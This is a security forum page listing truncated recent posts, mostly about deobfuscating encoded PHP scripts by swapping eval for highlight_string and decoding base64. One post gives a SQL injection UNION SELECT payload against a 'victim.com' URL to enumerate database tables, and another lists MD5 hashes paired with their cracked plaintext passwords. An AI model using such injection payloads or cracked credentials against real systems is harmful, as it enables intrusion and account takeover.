 |
|
 |
 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 102
 Members: 0
 Total: 102
|
|
|
|
|
|
Full disclosure |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
|
| This is not the output of a common hashing algorithm, so it's probably a custom implementation of a hashing or encryption mechanism. Can you provide us with a bit more context from where you got this ... |
|
|
|
|
| That's not an encoded string, it's a PHP variable. Then again, the variable name looks like an md5 string. So my guess is that the original variable names were all hashed during the file encoding. Thi ... |
|
|
|
|
The fopo is decoded in my previous post. The rest is already decoded, it just has random variable names  |
|
|
|
|
7894befef676b49e710ea2b1b90f0a9e:madeleine
3d801aa532c1cec3ee82d87a99fdf63f:temp
821c83a6df38d923343777f74f74af67:joco15
b272144ce3146b9f01be4e6b0ce6aafa:csokolade |
|
|
|
|
The frequently occuring string
JHUxNjQzNmFjY2Q2NTI2MzYwMDEyOTM4YWE4YWE5MzNlPSJceDYyIjskZWUxZWRhY2FjM2Y0MGEyNGY3YWJkNWR\nhNGFlODQ4MDU9Ilx4NjUiOyRvOTAyY2QwZmVmYzFjYmVjZjQwMmY4MjY5N2E1N2FiNz0iXHg2NiI7JG ... |
|
|
|
|
ok, just replace and use a decoder dezender one that will work?
thank you
After replacing, you don't need a decoder. Just put the code in a php file and put it on a server (xampp or simply apach ... |
|
|
|
|
| It's fairly easy. Replace the "eval" in the file with "highlight_string" and you should see your original code. Most encodings simply use a combination of taking your original file and encode it with ... |
|
|
|
|
| Script removed on request |
|
|
|
|
Well for example, here's how I decoded this file:
First I changed the first eval into highlight_string and put a die() after that line to prevent further execution of the script. This step revealed ... |
|
|
|
|
| Well most encodings just use a neat combination of the base64 encoding and the eval function, which takes PHP code as a string and executes it. So most of the times, decoding is just decoding the base ... |
|
|
|
|
| Haha my pleasure. Nothing better than a good manual decoding ^^ |
|
|
|
|
Have fun with it
<?php
if( ! defined( 'DATALIFEENGINE' ) ) {
die( "Hacking attempt!" );
}
include ENGINE_DIR . '/data/searchclouddata.php'; ... |
|
|
|
|
There you are
<?php require_once("\x63\165\x72\154\x2e\143\x6c\141\x73\163\x2e\160\x68\160"); ?>
<?php
class RajaUltoo {
var $host;
var $username;
var ... |
|
|
|
|
Here you are. I took the liberty of making the code readable instead of just giving it you on one line
<?php require_once("\x63\165\x72\154\x2e\143\x6c\141\x73\163\x2e\160\x68\160&q ... |
|
|
|
|
Your SQL syntax is wrong:
http://victim.com/project/articles.php?code=6&id=-603 union select 1,2,3,4,group_concat(table_name) from information_schema.tables where table_schema=datab ... |
|
|
| Page 1 of 50 |
Goto page 1, 2, 3 ... 48, 49, 50Next
All times are GMT |
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|
